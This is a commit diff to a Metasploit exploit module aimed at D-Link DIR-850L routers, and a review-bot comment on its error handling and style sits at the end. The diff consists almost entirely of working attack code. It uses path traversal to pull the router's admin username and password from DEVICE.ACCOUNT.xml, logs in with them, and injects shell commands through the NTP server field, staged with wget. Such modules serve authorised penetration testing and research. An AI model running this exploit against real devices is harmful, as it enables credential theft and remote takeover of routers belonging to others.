Update dlink_850l_unauth_exec.rb

MS-2855/keylogger-mettle-extension
Austin 2017-11-03 06:21:59 -04:00 committed by GitHub
parent 5b7d803f85
commit af583e843c
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 15 additions and 25 deletions


@ -1,12 +1,7 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'openssl' require 'openssl'
class MetasploitModule < Msf::Exploit::Remote class MetasploitModule < Msf::Exploit::Remote
Rank = AverageRanking Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager include Msf::Exploit::CmdStager
@ -49,7 +44,7 @@ class MetasploitModule < Msf::Exploit::Remote
xml = "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n" xml = "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n"
xml << "<postxml>\r\n" xml << "<postxml>\r\n"
xml << "<module>\r\n" xml << "<module>\r\n"
xml << " <service>../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml</service>\r\n" xml << " <service>../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml</service>\r\n"
xml << "</module>\r\n" xml << "</module>\r\n"
xml << "</postxml>" xml << "</postxml>"
uid = rand_text_alpha_lower(8) uid = rand_text_alpha_lower(8)
@ -68,6 +63,7 @@ class MetasploitModule < Msf::Exploit::Remote
parse = res.get_xml_document parse = res.get_xml_document
username = parse.at('//name').text username = parse.at('//name').text
password = parse.at('//password').text password = parse.at('//password').text
vprint_status("#{peer} - Retrieved the username/password combo #{username}/#{password}")
return username, password return username, password
rescue ::Rex::ConnectionError rescue ::Rex::ConnectionError
fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.") fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.")
@ -89,31 +85,25 @@ class MetasploitModule < Msf::Exploit::Remote
end end
end end
def hash_passwd(username, password, challenge) def login
hash = OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new('md5'), password.to_s, (username.to_s + challenge.to_s)).upcase username, password = retrieve_creds
return hash uid, challenge = retrieve_uid
end
def login(username, hash, uid)
begin begin
data = "id=#{username}&password=#{hash}" hash = OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new('md5'), password.to_s, (username.to_s + challenge.to_s)).upcase
res = send_request_cgi({ res = send_request_cgi({
'uri' => '/authentication.cgi', 'uri' => '/authentication.cgi',
'method' => 'POST', 'method' => 'POST',
'data' => data, 'data' => "id=#{username}&password=#{hash}",
'cookie' => "uid=#{uid}" 'cookie' => "uid=#{uid}"
}) })
return res return uid
rescue ::Rex::ConnectionError rescue ::Rex::ConnectionError
fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.") fail_with(Failure::Unknown, "#{peer} - Unable to connect to target.")
end end
end end
def execute_command(cmd, opts) def execute_command(cmd, opts)
username, password = retrieve_creds uid = login
uid, challenge = retrieve_uid
hash = hash_passwd(username, password, challenge)
login(username, hash, uid)
payload = "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n" payload = "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n"
payload << "<postxml>\r\n" payload << "<postxml>\r\n"
payload << "<module>\r\n" payload << "<module>\r\n"
@ -123,7 +113,7 @@ class MetasploitModule < Msf::Exploit::Remote
payload << " <ntp>\r\n" payload << " <ntp>\r\n"
payload << " <enable>1</enable>\r\n" payload << " <enable>1</enable>\r\n"
payload << " <period>604800</period>\r\n" payload << " <period>604800</period>\r\n"
payload << " <server>metelesku; (#{cmd};) &amp; exit; </server>\r\n" payload << " <server>#{Rex::Text.rand_text_alpha_lower(8)}; (#{cmd}) </server>\r\n"
payload << " </ntp>\r\n" payload << " </ntp>\r\n"
payload << " <ntp6>\r\n" payload << " <ntp6>\r\n"
payload << " <enable>1</enable>\r\n" payload << " <enable>1</enable>\r\n"
@ -140,13 +130,15 @@ class MetasploitModule < Msf::Exploit::Remote
payload << "</module>\r\n" payload << "</module>\r\n"
payload << "</postxml>" payload << "</postxml>"
begin begin
# save configuration
res = send_request_cgi({ res = send_request_cgi({
'uri' => '/hedwig.cgi', 'uri' => '/hedwig.cgi',
'method' => 'POST', 'method' => 'POST',
'ctype' => 'text/xml', 'ctype' => 'text/xml',
'data' => payload, 'data' => payload,
'cookie' => "uid=#{uid}" 'cookie' => "uid=#{uid}"
}) })
# execute configuration
res = send_request_cgi({ res = send_request_cgi({
'uri' => '/pigwidgeon.cgi', 'uri' => '/pigwidgeon.cgi',
'method' => 'POST', 'method' => 'POST',
@ -162,9 +154,7 @@ class MetasploitModule < Msf::Exploit::Remote
def exploit def exploit
print_status("#{peer} - Initiating exploitation...") print_status("#{peer} - Initiating exploitation...")
execute_cmdstager( execute_cmdstager(
:flavor => :wget, :flavor => :wget
:background => true,
:nodelete => true
) )
end end
end end
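Review bot: In the `login` hunk (@ -89,31 +85,25) the new method assigns `res` from the `/authentication.cgi` POST and then returns `uid` without ever inspecting it, so a nil or failing response is silently treated as a successful login and `execute_command` continues with an unauthenticated `uid` cookie; the old version at least handed `res` back to the caller. At minimum the method should fail closed, e.g. `fail_with(Failure::NoAccess, "#{peer} - Authentication request failed") unless res` before `return uid`, and ideally check whatever success indicator the device's response carries, which is not visible in this diff. The `rescue ::Rex::ConnectionError` branch reports a connection failure as `Failure::Unknown`, which makes the two failure modes indistinguishable in the module output. As a point of style, the `/pigwidgeon.cgi` hunk calls `Rex::Text.rand_text_alpha_lower(8)` while `retrieve_uid` above uses the mixed-in `rand_text_alpha_lower(8)`; one form should be used throughout.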